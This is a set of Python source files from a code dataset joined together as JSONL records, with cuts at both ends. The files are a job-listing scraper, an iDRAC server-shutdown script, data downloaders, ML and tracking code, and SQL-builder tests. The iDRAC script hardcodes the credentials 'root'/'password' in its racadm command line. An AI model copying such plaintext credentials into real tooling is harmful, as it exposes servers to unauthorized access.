\"\"\"\n Arguments: \n - response: scrapy response object for the listing page\n\n This method is called by `Scraper.parse()` method if load_all_pages \n Return a URL string or None if there no more pages to load \n\n @with_selenium\n @url https://charityvillage.com/search/#results/5f4583ff061c57fc640eb1dc?job_type=-Unpaid+Volunteer+Position&page_num=1&kw=\n @returns_valid_link\n \"\"\"\n # The next button doesn't have a href attribute, we need to click it with javascript and extract the page URL\n if 'Next' in response.xpath('//*[@id=\"cl-jobsearch-results-list\"]/div/div[2]/ul/li[last()]/a/text()').get() :\n next_buttons=response.request.meta['driver'].find_elements_by_xpath('//*[@id=\"cl-jobsearch-results-list\"]/div/div[2]/ul/li[last()]/a')\n if len(next_buttons)>0 :\n response.request.meta['driver'].execute_script(SCROLL_DOWN)\n time.sleep(1)\n response.request.meta['driver'].execute_script(\"arguments[0].click();\", next_buttons[0])\n time.sleep(3)\n return response.request.meta['driver'].current_url\n else:\n return None","sub_path":"charityvillage_jobs/spiders/charityvillage_com.py","file_name":"charityvillage_com.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"242103890","text":"import xlrd\r\n\r\nfrom tkinter import Tk\r\nfrom tkinter import filedialog\r\n\r\nimport subprocess\r\n\r\ndef ping(ip): #Check ping response\r\n\r\n #ping requested server\r\n try:\r\n ping = subprocess.Popen(\r\n [\"ping\", \"-n\", \"1\", '{}'.format(ip)],\r\n stdout = subprocess.PIPE,\r\n stderr = subprocess.PIPE)\r\n out, error = ping.communicate()\r\n except Exception as err:\r\n print(err)\r\n\r\n if \"TTL\" in str(out):\r\n return True\r\n else: return False\r\n\r\ndef shutdownServer(tmp_ip, ip, name):\r\n if ping(tmp_ip):\r\n sub = subprocess.Popen([\"powershell\", \"& racadm -r {} -u root -p password --nocertwarn serveraction powerdown\".format(tmp_ip)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n isSuccess = sub.stdout.readlines()\r\n if \"successfully\" in str(isSuccess).strip(\"b'\").replace(\"\\\\r\\\\n\", \"\").replace(\" \", \"\").replace(\"\\\\r\", \"\"):\r\n print(colors.OKGREEN + \"{} Shutdown was Successfull\".format(name) + colors.ENDC)\r\n return True\r\n elif \"already\" in str(isSuccess).strip(\"b'\").replace(\"\\\\r\\\\n\", \"\").replace(\" \", \"\").replace(\"\\\\r\", \"\"):\r\n print(colors.OKPURPLE + \"{} already in Shutdown state\".format(name) + colors.ENDC)\r\n else: \r\n print(colors.FAIL + \"{} Shutdown was not Successfull\".format(name) + colors.ENDC)\r\n return False\r\n\r\n elif ping(ip):\r\n sub = subprocess.Popen([\"powershell\", \"& racadm -r {} -u root -p password --nocertwarn serveraction powerdown\".format(ip)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n isSuccess = sub.stdout.readlines()\r\n if \"successfully\" in str(isSuccess).strip(\"b'\").replace(\"\\\\r\\\\n\", \"\").replace(\" \", \"\").replace(\"\\\\r\", \"\"):\r\n print(colors.OKGREEN + \"{} Shutdown was Successfull\".format(name) + colors.ENDC)\r\n return True\r\n elif \"already\" in str(isSuccess).strip(\"b'\").replace(\"\\\\r\\\\n\", \"\").replace(\" \", \"\").replace(\"\\\\r\", \"\"):\r\n print(colors.OKPURPLE + \"{} already in Shutdown state\".format(name) + colors.ENDC)\r\n else: \r\n print(colors.FAIL + \"{} Shutdown was not Successfull\".format(name) + colors.ENDC)\r\n return False\r\n\r\n else: print(colors.OKPURPLE + \"Both temporary ip address and ip address aren\\'t pingable for server {}\".format(name) + colors.ENDC)\r\n\r\nclass colors:\r\n OKGREEN = '\\033[92m'\r\n FAIL = '\\033[91m'\r\n OKPURPLE = '\\033[95m'\r\n ENDC = '\\033[0m'\r\n\r\nclass readExcel:\r\n def __init__(self, excelFile):\r\n self.excelFile = excelFile\r\n\r\n def read(self):\r\n wb = xlrd.open_workbook(self.excelFile)\r\n sheet = wb.sheet_by_name(\"Server_Configuration\")\r\n iDrac_Data = []\r\n for i in range(6, sheet.nrows, +1):\r\n if \"1\" in str(sheet.cell_value(i, 1)):\r\n iDrac = {}\r\n iDrac[\"tmp_ip\"] = sheet.cell_value(i, 8)\r\n iDrac[\"ip_address\"] = sheet.cell_value(i, 9)\r\n iDrac[\"name\"] = sheet.cell_value(i, 6)\r\n #Append al idrac data\r\n iDrac_Data.append(iDrac)\r\n \r\n return iDrac_Data\r\n\r\nif __name__ == \"__main__\":\r\n #Choose excel file \r\n file_root = Tk()\r\n file_root.withdraw()\r\n excel_file = filedialog.askopenfilename(filetypes =[('Excel Files', '*.xlsx')])\r\n excelData = readExcel(excel_file).read()\r\n\r\n answer = input(\"Would you like to continue (y/n/A(Yes to All):\")\r\n\r\n if answer == \"A\":\r\n for server in excelData:\r\n shutdownServer(server[\"tmp_ip\"], server[\"ip_address\"], server[\"name\"])\r\n\r\n elif answer == \"y\":\r\n print(\"Put in servers indexes (coma seperated) that you wish to Shutdown (1,4,5..):\")\r\n for i, server in zip(range(0, len(excelData)), excelData):\r\n print(str(i+1) + \". \" + server[\"name\"])\r\n\r\n print(\"\\n\")\r\n serversToClear = input(\"Servers: \")\r\n serversToClear = serversToClear.split(\",\")\r\n\r\n for i, server in zip(range(0, len(excelData)), excelData):\r\n if str(i+1) in serversToClear:\r\n shutdownServer(tmp_ip=server[\"tmp_ip\"], ip=server[\"ip_address\"], name=server[\"name\"])\r\n\r\n elif answer == \"n\":\r\n print(colors.OKPURPLE + \"Exiting script..\" + colors.ENDC)\r\n\r\n","sub_path":"iDrac-Shutdown.py","file_name":"iDrac-Shutdown.py","file_ext":"py","file_size_in_byte":4244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"454314671","text":"#!/usr/bin/env ipython\r\n\r\nfrom tqdm import tqdm\r\nimport requests\r\nimport regex as re\r\nimport os\r\n\r\nos.chdir(os.path.dirname(__file__))\r\nprint(os.getcwd())\r\n\r\nlangs = ['de', 'en', 'es', 'fr', 'ja', 'zh']\r\ndats = ['train', 'dev', 'test']\r\n\r\nfor dat in dats:\r\n\tfor lang in langs:\r\n\t\turl = \"https://amazon-reviews-ml.s3-us-west-2.amazonaws.com/json/\"+dat+\"/dataset_\"+lang+\"_\"+dat+\".json\"\r\n\t\tprint(url)\r\n\t\t\r\n\t\t# If file already exists\r\n\t\tif(os.path.isfile(os.sep.join(re.split('/', url)[-2:]))): print(\"Already exists!!\"); continue\r\n\t\t\r\n\t\t# Streaming, so we can iterate over the response.\r\n\t\treq = requests.get(url, stream=True)\r\n\t\t\r\n\t\t# Total size in bytes.\r\n\t\ttotal_size = int(req.headers.get('content-length', 0))\r\n\t\tblock_size = 1024 #1 Kibibyte\r\n\t\t\r\n\t\tbar = tqdm(total=total_size, unit='iB', unit_scale=True)\r\n\t\t\r\n\t\twith open(os.sep.join(re.split('/', url)[-2:]), 'wb') as foo:\r\n\t\t\tfor data in req.iter_content(block_size):\r\n\t\t\t\tbar.update(len(data))\r\n\t\t\t\tfoo.write(data)\r\n\t\tbar.close()\r\n\t\t\r\n\t\tif total_size != 0 and bar.n != total_size: print(\"ERROR, something went wrong\")\r\n\t\t\r\n\tprint(\"done\")","sub_path":"code/Amazon Reviews/extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118754013","text":"import numpy as np\nimport math\n\n\n_entradas = np.array(\n [\n [0, 0],\n [0, 1],\n [1,0],\n [1,1]\n ]\n)\n\n_pesos_camada_1 = np.array(\n [\n [-0.424, 0.358],\n [-0.74, -0.577],\n [-0.961, -0.469],\n ]\n)\n\n_saida = np.array([0, 1, 1, 0])\n\n\ndef ativacao(x):\n \"\"\"\n Função de de ativação segmode\n :param x:\n :return:\n \"\"\"\n y = 1 / (1 + math.exp(-x))\n\n # arredondar para 3 casas decimais\n y = round(y, 3)\n return y\n\n\ndef soma_camada_1(entradas, pesos):\n \"\"\"\n Soma da camada camada 1\n\n :param entradas:\n :param pesos:\n :return:\n \"\"\"\n resultado_intermediario = []\n for i in range(len(entradas)):\n x1, x2 = entradas[i]\n for j in range(len(pesos)):\n peso_x1, peso_x2 = pesos[j]\n resultado_intermediario.append(x1 * peso_x1 + x2 * peso_x2)\n\n return resultado_intermediario\n\n\nresultado_somas_camada_1 = soma_camada_1(_entradas, _pesos_camada_1)\nprint('Resultado da soma da camada 1')\nprint(np.array(resultado_somas_camada_1).reshape(4, 3))\nprint('-' * 30)\n\nresultado_ativacao = []\n\nfor resultado_soma in resultado_somas_camada_1:\n resultado_ativacao.append(ativacao(resultado_soma))\n\nprint('Resultado da função de ativação da camada 1')\nprint(np.array(resultado_ativacao).reshape(4,3))\nprint('-' * 30)\n\n\"\"\"\n Gerando as novas entradas\n Foi necessário converter a lista para array\n o método reshape serve para colocar em matriz bi-direcional\n\"\"\"\n_novas_entradas = np.array(resultado_ativacao).reshape(4, 3)\n_pesos_camada_2 = np.array([-0.017, -0.893, 0.148])\n\nprint('Novas entradas')\nprint(_novas_entradas)\nprint('-' * 30)\n\ndef soma_camada_2(entradas, pesos):\n \"\"\"\n Soma da camada camada 2\n\n :param entradas:\n :param pesos:\n :return:\n \"\"\"\n resultado_intermediario = []\n for i in range(len(entradas)):\n x1, x2, x3 = entradas[i]\n peso_x1, peso_x2, peso_x3 = pesos\n somatorio = x1 * peso_x1 + x2 * peso_x2 + x3 * peso_x3\n resultado_intermediario.append(round(somatorio, 3))\n\n return resultado_intermediario\n\n\nprint('Resultado soma camada 2')\nresultado_somas_camada_2 = soma_camada_2(_novas_entradas, _pesos_camada_2)\nprint(soma_camada_2(_novas_entradas, _pesos_camada_2))\n# Aqui tem uma pequena diferença no segundo resultado\nprint('-' * 30)\n\nprint('Resultado da ativação')\nresultado_ativacao = []\nfor resultado_soma in resultado_somas_camada_2:\n resultado_ativacao.append(ativacao(resultado_soma))\n\nprint(resultado_ativacao)","sub_path":"ia/aula-03/exercicio-01.py","file_name":"exercicio-01.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"565625173","text":"import re\nfrom calc_convert_list import Converter\nfrom calc_distinguish import Distinguish\nfrom calc_check_sequence_correction import Check\nfrom calc_data_base import CalcDataBase\n\n\nclass Sequence:\n\n def enter_sequence(self, data_input, user_choice, n_terminus, c_terminus):\n\n data_sequence = data_input\n\n '''checks if sequence is correct'''\n check_sequence1 = Check()\n checking_result = check_sequence1.check_sequence(data_sequence)\n if checking_result[0:6] == 'Please': # P - means there is an error\n return checking_result\n else:\n '''mark non standard amino by adding *'''\n mark_non_standard = Distinguish()\n mark_data_sequence = mark_non_standard.distinguish_non_standard(\n data_sequence)\n\n '''Search for non standard amino - 3 characters'''\n non_standard_amino = re.findall(\"\\((.*?)\\)\", mark_data_sequence)\n\n '''Splits sequence by () and remove '' '''\n splited_sequence = re.split(\"[(|)]\", mark_data_sequence)\n for element in splited_sequence:\n if element == '':\n splited_sequence.remove(element)\n\n '''Builds list with divided standard and non standard amino'''\n final_list = []\n for element in splited_sequence:\n if element not in non_standard_amino:\n final_list.append(self.split_sequence(element))\n else:\n final_list.append(element)\n\n '''Use converter to prepare final list'''\n converted_list = Converter()\n sequence_list = list(converted_list.list_converter(final_list))\n # returns amino_calculator function and sequence_list\n return self.amino_calculator(sequence_list, user_choice, n_terminus, c_terminus), sequence_list\n\n def split_sequence(self, string_to_split):\n return [char for char in string_to_split]\n\n def amino_calculator(self, sequence_list, user_choice, n_terminus, c_terminus):\n '''add endings to sequence_list'''\n if n_terminus != '':\n sequence_list.append(n_terminus)\n if c_terminus != '':\n sequence_list.append(c_terminus)\n\n base = CalcDataBase()\n amino_data_base = base.data_base(user_choice)\n mass_result = 0\n try:\n\n for single_amino in sequence_list:\n mass_result += amino_data_base[single_amino]\n result = round(mass_result, 2)\n return result # returns the result\n except KeyError:\n return \"Please be informed that sequence is incorrect;Amino acid or unusual amino acid, doesnt exist\"\n","sub_path":"calc_sequence_calculator.py","file_name":"calc_sequence_calculator.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"38844516","text":"from glob import glob\nimport sys\nimport os\n\ntruth_dir = sys.argv[sys.argv.index('-t') + 1]\npred_dir = sys.argv[sys.argv.index('-p') + 1]\n\ntruths = glob(os.path.join(truth_dir, '*.txt'))\npreds = glob(os.path.join(pred_dir, '*.txt'))\n\ntruth_dict = dict()\nfor truth in truths:\n filename = os.path.basename(truth)\n truth_dict[filename] = set()\n\n truth_lines = open(truth).readlines()\n for line in truth_lines:\n split = line.split()\n f1 = int(split[0])\n f2 = int(split[1])\n for i in range(f1, f2 + 1):\n truth_dict[filename].add(i)\n\ncorrect = 0\ntotal = 0\nfor pred in preds:\n filename = os.path.basename(pred)\n \n if filename in truth_dict:\n pred_lines = open(pred).readlines()\n for line in pred_lines:\n split = line.split()\n f1 = int(split[0])\n f2 = int(split[1])\n for i in range(f1, f2 + 1):\n if i in truth_dict[filename]:\n correct += 1\n total += 1\n\nprint(correct / total)\nprint(correct, total)\n\n\n","sub_path":"speech/analysis/get_accuracy.py","file_name":"get_accuracy.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"185189607","text":"import numpy as np \nimport cv2\nimport matplotlib.pyplot as plt\nimport argparse\nimport os\nfrom utils import linear_mapping, pre_process, random_warp, _pre_training, _get_gauss_response,_get_init_ground_truth, load_images_from_folder, failOrNot, lmosse\n\n#some default params\ninitTracking = False\nix, iy = -1, -1\nw, h = 0, 0\ninteval = 30 \nlr=0.325\nsigma=100\nnum_pretrain=128\ncount = -1\nold_surface = float('inf')\nfail = False\nprev_frame = []\nkernel = np.ones((3,3), np.uint8) \n\n# main function\nif __name__ == '__main__':\n\tparse = argparse.ArgumentParser()\n\tparse.add_argument(\"-o\", \"--output_folder\", required=False, default='./', help=\"output video file\")\n\tparse.add_argument(\"-n\", \"--video_name\", required=True, help=\"video name\")\n\t#mosse\n\tparse.add_argument('--lr', type=float, default=0.125, help='the learning rate')\n\tparse.add_argument('--sigma', type=float, default=100, help='the sigma')\n\tparse.add_argument('--num_pretrain', type=int, default=128, help='the number of pretrain')\n\tparse.add_argument('--rotate', action='store_true', help='if rotate image during pre-training.')\n\tparse.add_argument(\"-sv\",'--svideo', default = False, help='save the output as a video')\n\tparse.add_argument(\"-sf\",'--sframe', default = False, help='save result frames')\n\n\t# to complete \n\targs = vars(parse.parse_args())\n\toutput_folder = args['output_folder']\n\tv_name = args['video_name']\n\tvideo_name = v_name.split('.')[0]\n\tlr= args['lr']\n\tsigma= args['sigma']\n\tnum_pretrain= args['num_pretrain']\n\tsvideo = args['svideo']\n\tsframe = args['sframe']\n\n\t#creat paths\n\tout_path = './'+output_folder+'/'\n\tif not os.path.exists(out_path):\n\t\tos.mkdir(out_path)\n\t#center position output_folder+'/'\n\tmosse_txt_name = out_path +video_name + \"_centerPos_mosse.txt\"\n\tfm = open(mosse_txt_name,'w')\t\n\n\t# load shadow masks\n\tmask_path = './'+video_name+'_mask/'\n\tmasks = load_images_from_folder(mask_path)\n\n\t# begin the algorithm\n\tcap = cv2.VideoCapture(v_name)\n\n\t# get ground truth box postion\n\tf = open(video_name+\".txt\",\"r\")\n\tline = f.readline().split(',')\n\tix = int(line[0])\n\tiy = int(line[1])\n\tw = int(line[2])\n\th = int(line[3])\n\tf.close()\n\n\tinitTracking = True\n\n\twhile(cap.isOpened()):\n\t\tcount += 1\n\n\t\tret, frame = cap.read()\n\t\tif not ret:\n\t\t\tbreak\n\n\t\t# get the image of the first frame (read as gray scale image)\n\t\tframe_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n\t\tif(initTracking):\n\t\t\t# create the video \n\t\t\tif svideo:\n\t\t\t\tfourcc = cv2.VideoWriter_fourcc(*'mp4v') # Be sure to use lower case\n\t\t\t\ts= './'+output_folder+'/'+video_name.split('.')[0]+'_result'+\".mp4\"\n\t\t\t\tout = cv2.VideoWriter(s, fourcc, 20.0, (frame.shape[1], frame.shape[0]))\n\n\t\t\t# initialise mosse\n\t\t\tinit_gt = (ix,iy,w,h)\n\t\t\tinit_gt = np.array(init_gt).astype(np.int64)\n\t\t\t# start to draw the gaussian response\n\t\t\tresponse_map = _get_gauss_response(args, frame_gray, init_gt)\n\t\t\t# start to create the training set \n\t\t\t# get the goa\n\t\t\tg = response_map[init_gt[1]:init_gt[1]+init_gt[3], init_gt[0]:init_gt[0]+init_gt[2]]\n\t\t\tfi = frame_gray[init_gt[1]:init_gt[1]+init_gt[3], init_gt[0]:init_gt[0]+init_gt[2]]\n\t\t\tG = np.fft.fft2(g)\n\n\t\t\t# pre-training\n\t\t\tAi, Bi = _pre_training(args,fi, G)# Ai:corr of G and fi Bi:spectrum of fi\n\t\t\t# first frame\n\t\t\tAi = lr * Ai\n\t\t\tBi = lr * Bi\n\t\t\tpos = init_gt.copy()\n\t\t\tclip_pos = np.array([pos[0], pos[1], pos[0]+pos[2], pos[1]+pos[3]]).astype(np.int64)\n\t\t\tinitTracking = False\n\n\t\t\t# prepare for Lmosse\n\t\t\tprev_frame = frame_gray.copy()\n\t\t\t# prepare for original mosse response\n\t\t\tmosse_fi = fi.copy()\n\t\t\tmosse_Ai = Ai.copy()\n\t\t\tmosse_Bi = Bi.copy()\n\t\t\tmosse_clip_pos = clip_pos.copy()\n\t\t\tmosse_pos = pos.copy()\n\t\telse:\n\t\t\t#start tracking\t\n\t\t\tframe_gray = frame_gray.astype(np.float32)\n\t\t\t#filter noise\n\t\t\tmask_filtered = cv2.dilate(cv2.erode(masks[count], kernel, iterations=1), kernel, iterations=1)\n\t\t\tfail, old_surface = failOrNot(old_surface, mask_filtered, pos)\n\n\t\t\tif fail: \n\n\t\t\t\tlpos, lregion = lmosse(args,pos,prev_frame,frame_gray,mask_filtered)\n\n\t\t\t\t# draw\n\t\t\t\tcv2.rectangle(frame, (lpos[0], lpos[1]), (lpos[0]+lpos[2], lpos[1]+lpos[3]), (0, 255, 255), 2) # yello\n\t\t\t\tcv2.circle(frame,(int(lpos[0]+lpos[2]/2),int(lpos[1]+lpos[3]/2)), 3, (0,0,255), -1) # red\n\t\t\t\tcv2.rectangle(frame, (lregion[0], lregion[1]), (lregion[0]+lregion[2], lregion[1]+lregion[3]), (255, 255, 255), 2) # white\n\n\t\t\t\t# write down the bounding box location\n\t\t\t\tfm.write(str(lpos))\n\t\t\t\tfm.write('\\n')\n\n\t\t\telse: \n\t\t\t\t# mosse\n\t\t\t\tHi = Ai / Bi\n\t\t\t\t# subWindow\n\t\t\t\tfi = frame_gray[clip_pos[1]:clip_pos[3], clip_pos[0]:clip_pos[2]]\n\t\t\t\t# keep win size unchanged\n\t\t\t\tfi = pre_process(cv2.resize(fi, (init_gt[2], init_gt[3])))\n\t\t\t\tGi = Hi * np.fft.fft2(fi) \n\t\t\t\tgi = linear_mapping(np.fft.ifft2(Gi))\n\t\t\t\t# find the max pos\n\t\t\t\tmax_value = np.max(gi)\n\t\t\t\tmax_pos = np.where(gi == max_value)\n\t\t\t\tdy = int(np.mean(max_pos[0]) - gi.shape[0] / 2)\n\t\t\t\tdx = int(np.mean(max_pos[1]) - gi.shape[1] / 2)\n\t\t\t\t# update the position\n\t\t\t\tpos[0] = pos[0] + dx \n\t\t\t\tpos[1] = pos[1] + dy\n\t\t\t\t# trying to get the clipped position [xmin, ymin, xmax, ymax]\n\t\t\t\tclip_pos[0] = np.clip(pos[0], 0, frame.shape[1])\n\t\t\t\tclip_pos[1] = np.clip(pos[1], 0, frame.shape[0])\n\t\t\t\tclip_pos[2] = np.clip(pos[0]+pos[2], 0, frame.shape[1])\n\t\t\t\tclip_pos[3] = np.clip(pos[1]+pos[3], 0, frame.shape[0])\n\t\t\t\tclip_pos = clip_pos.astype(np.int64)\n\t\t\t\t# get the next fi using the new bounding box\n\t\t\t\tfi = frame_gray[clip_pos[1]:clip_pos[3], clip_pos[0]:clip_pos[2]]\n\t\t\t\tfi = pre_process(cv2.resize(fi, (init_gt[2], init_gt[3])))\n\t\t\t\t# update\n\t\t\t\tAi = lr * (G * np.conjugate(np.fft.fft2(fi))) + (1 - lr) * Ai\n\t\t\t\tBi = lr * (np.fft.fft2(fi) * np.conjugate(np.fft.fft2(fi))) + (1 - lr) * Bi\n\t\t\t\t# green bounding box when original mosse succeeds\n\t\t\t\tcv2.rectangle(frame, (pos[0], pos[1]), (pos[0]+pos[2], pos[1]+pos[3]), (0, 255, 255), 2) \n\t\t\t\t# write down the bounding box location\n\t\t\t\tfm.write(str(pos))\n\t\t\t\tfm.write('\\n')\n\n\t\t\tprev_frame = frame_gray.copy()\n\n\n\t\t\t#--------start ORIGINAL MOSSE RESPONSE--------\n\n\t\t\tmosse_Hi = mosse_Ai / mosse_Bi\n\t\t\tmosse_fi = frame_gray[mosse_clip_pos[1]:mosse_clip_pos[3], mosse_clip_pos[0]:mosse_clip_pos[2]]\n\t\t\tmosse_fi = pre_process(cv2.resize(mosse_fi, (init_gt[2], init_gt[3])))\n\t\t\tmosse_Gi = mosse_Hi * np.fft.fft2(mosse_fi)\n\t\t\tmosse_gi = linear_mapping(np.fft.ifft2(mosse_Gi))\n\t\t\t# find the max pos...\n\t\t\tmosse_max_value = np.max(mosse_gi)\n\t\t\tmosse_max_pos = np.where(mosse_gi == mosse_max_value)\n\t\t\tmosse_dy = int(np.mean(mosse_max_pos[0]) - mosse_gi.shape[0] / 2)\n\t\t\tmosse_dx = int(np.mean(mosse_max_pos[1]) - mosse_gi.shape[1] / 2)\n\t\t\t# update the position...\n\t\t\tmosse_pos[0] = mosse_pos[0] + mosse_dx\n\t\t\tmosse_pos[1] = mosse_pos[1] + mosse_dy\n\t\t\t# trying to get the clipped position [xmin, ymin, xmax, ymax]\n\t\t\tmosse_clip_pos[0] = np.clip(mosse_pos[0], 0, frame.shape[1])\n\t\t\tmosse_clip_pos[1] = np.clip(mosse_pos[1], 0, frame.shape[0])\n\t\t\tmosse_clip_pos[2] = np.clip(mosse_pos[0]+mosse_pos[2], 0, frame.shape[1])\n\t\t\tmosse_clip_pos[3] = np.clip(mosse_pos[1]+mosse_pos[3], 0, frame.shape[0])\n\t\t\tmosse_clip_pos = mosse_clip_pos.astype(np.int64)\n\t\t\t# get the current fi..\n\t\t\tmosse_fi = frame_gray[mosse_clip_pos[1]:mosse_clip_pos[3], mosse_clip_pos[0]:mosse_clip_pos[2]]\n\t\t\tmosse_fi = pre_process(cv2.resize(mosse_fi, (init_gt[2], init_gt[3])))\n\t\t\t# online update...\n\t\t\tmosse_Ai = lr * (G * np.conjugate(np.fft.fft2(mosse_fi))) + (1 - lr) * mosse_Ai\n\t\t\tmosse_Bi = lr * (np.fft.fft2(mosse_fi) * np.conjugate(np.fft.fft2(mosse_fi))) + (1 - lr) * mosse_Bi\n\t\t\t# visualize the tracking process...\n\t\t\tcv2.rectangle(frame, (mosse_pos[0], mosse_pos[1]), (mosse_pos[0]+mosse_pos[2], mosse_pos[1]+mosse_pos[3]), (255, 0, 0), 2)\n\n\t\t\t#--------end ORIGINAL MOSSE RESPONSE--------\n\n\n\t\t\t# put frame number\n\t\t\tcv2.putText(frame, 'Frame number: '+str(count), (8,20), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0,255,255), 2) # yellow text\n\t\t\tcv2.imshow('Tracking', frame)\n\t\t\t# write the txt file of the center position of the bounding box of each frame while tracking\n\n\t\t\t# if record, save the frames\n\t\t\tif svideo: \n\t\t\t\tout.write(frame) \n\n\t\t\t# save frames with bounding box\n\t\t\tif sframe :\n\t\t\t\ts = \"{0:0>3}\".format(count)\n\t\t\t\tpath_box = out_path + '/'+video_name.split('.')[0]+'_framesWithBox/'\n\t\t\t\tif not os.path.exists(path_box):\n\t\t\t\t\tos.mkdir(path_box)\n\t\t\t\tcv2.imwrite(path_box +s+ '_box.png', frame)\n\n\t\tc = cv2.waitKey(inteval) & 0xFF\n\t\tif c==27 or c==ord('q'):\n\t\t\tbreak\n\n\n\n\n\tcap.release()\n\tif svideo:\n\t\tout.release()\n\tfm.close()\n\tcv2.destroyAllWindows()","sub_path":"codes/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"84577728","text":"# coding: utf-8\nimport unittest\n\nfrom pypika import Table, Query, PostgreSQLQuery\n\n__author__ = \"Timothy Heys\"\n__email__ = \"theys@kayak.com\"\n\n\nclass DeleteTests(unittest.TestCase):\n table_abc = Table('abc')\n\n def test_omit_where(self):\n q = Query.from_('abc').delete()\n\n self.assertEqual('DELETE FROM \"abc\"', str(q))\n\n def test_omit_where__table_schema(self):\n q = Query.from_(Table('abc', 'schema1')).delete()\n\n self.assertEqual('DELETE FROM \"schema1\".\"abc\"', str(q))\n\n def test_where_field_equals(self):\n q1 = Query.from_(self.table_abc).where(self.table_abc.foo == self.table_abc.bar).delete()\n q2 = Query.from_(self.table_abc).where(self.table_abc.foo.eq(self.table_abc.bar)).delete()\n\n self.assertEqual('DELETE FROM \"abc\" WHERE \"foo\"=\"bar\"', str(q1))\n self.assertEqual('DELETE FROM \"abc\" WHERE \"foo\"=\"bar\"', str(q2))\n\n\nclass PostgresDeleteTests(unittest.TestCase):\n table_abc = Table('abc')\n\n def test_delete_returning(self):\n q1 = PostgreSQLQuery.from_(self.table_abc).where(\n self.table_abc.foo == self.table_abc.bar\n ).delete().returning(self.table_abc.id)\n\n self.assertEqual('DELETE FROM \"abc\" WHERE \"foo\"=\"bar\" RETURNING id', str(q1))\n\n def test_delete_returning_str(self):\n q1 = PostgreSQLQuery.from_(self.table_abc).where(\n self.table_abc.foo == self.table_abc.bar\n ).delete().returning('id')\n\n self.assertEqual('DELETE FROM \"abc\" WHERE \"foo\"=\"bar\" RETURNING id', str(q1))\n","sub_path":"pypika/tests/test_deletes.py","file_name":"test_deletes.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"331107211","text":"import FWCore.ParameterSet.Config as cms\n\ncleaningParameters = cms.PSet(\n\n vertexLabel = cms.InputTag(\"offlinePrimaryVertices\"),\n gtLabel = cms.InputTag(\"gtDigis\"),\n\n HLT_PhysDec = cms.string(\"HLT_PhysicsDeclared\"),\n \n trigSelection = cms.PSet(\n andOr = cms.bool( False ),\n #dbLabel = cms.string( 'jetmet_trigsel' ), # will be discussed below (DB)\n #dcsInputTag = cms.InputTag( \"scalersRawToDigi\" ),\n #dcsPartitions = cms.vint32( 24, 25, 26, 27 ),\n #andOrDcs = cms.bool( False ),\n #errorReplyDcs = cms.bool( False ),\n #gtInputTag = cms.InputTag( \"gtDigis\" ),\n #gtDBKey = cms.string( 'jetmet_gtsel' ),\n #gtStatusBits = cms.vstring( 'PhysDecl' ), \n #andOrGt = cms.bool( False ),\n #errorReplyGt = cms.bool( False ),\n #l1DBKey = cms.string( 'jetmet_l1sel' ),\n #l1Algorithms = cms.vstring( 'L1Tech_BPTX_plus_AND_minus.v0 AND ( L1Tech_BSC_minBias_threshold1.v0 OR L1Tech_BSC_minBias_threshold2.v0 ) AND NOT ( L1Tech_BSC_halo_beam2_inner.v0 OR L1Tech_BSC_halo_beam2_outer.v0 OR L1Tech_BSC_halo_beam1_inner.v0 OR L1Tech_BSC_halo_beam1_outer.v0 )' ), \n #andOrL1 = cms.bool( False ),\n #errorReplyL1 = cms.bool( False ),\n hltInputTag = cms.InputTag( \"TriggerResults::HLT\" ),\n hltDBKey = cms.string( 'jetmet_hltsel' ),\n hltPaths = cms.vstring( '' ), \n andOrHlt = cms.bool( False ),\n errorReplyHlt = cms.bool( False ),\n ),\n techTrigsAND = cms.vuint32(),\n techTrigsOR = cms.vuint32(),\n techTrigsNOT = cms.vuint32(),\n \n #Turn on extra checks\n doPrimaryVertexCheck = cms.bool(True),\n doHLTPhysicsOn = cms.bool(False),\n \n #Vertex cleanup parameters\n nvtx_min = cms.int32(1), \n nvtxtrks_min = cms.int32(0), #not used by default\n vtxndof_min = cms.int32(4),\n vtxchi2_max = cms.double(9999), #not used by default\n vtxz_max = cms.double(24.0),\n \n #Switch on tight filters for BeamHalo, JetID, HCALnoise\n tightBHFiltering = cms.bool(False),\n tightJetIDFiltering = cms.int32(-1), #-1 off, 0 minimal, 1 loose, 2 tight\n)\n","sub_path":"DQMOffline/JetMET/python/jetMETDQMCleanup_cff.py","file_name":"jetMETDQMCleanup_cff.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"279662616","text":"#formula for detecting speaker: 29 spaces + capital letter\nimport re\nimport string\ncaps_exclusions = ['OK']\nspeaker_pattern = re.compile(\"^\\s{29}[A-Z\\s]+$\")\n\nclass Line:\n def __init__(self, speaker, words):\n self.speaker = speaker\n self.words = words\n\nfile = './Seinfeld Scripts/S01E01.txt'\nwith open(file) as f:\n script = f.read()\nlines = script.split('\\n')\n# print(lines)\nfor line in lines:\n if speaker_pattern.match(line):\n print(speaker_pattern.match(line))\n # print(line)\n# # get rid of everything inside () and []\n# script = re.sub(r'\\([^)]*\\)', ' ', script)\n# script = re.sub(r'\\[[^)]*\\]', ' ', script)\n#\n# # replace all punctuation besides ' with whitespace\n# punc = '!\"#$%&()*+,-./:;<=>?@[\\\\]^_`{|}~\\n'\n# script = script.translate(str.maketrans(punc, 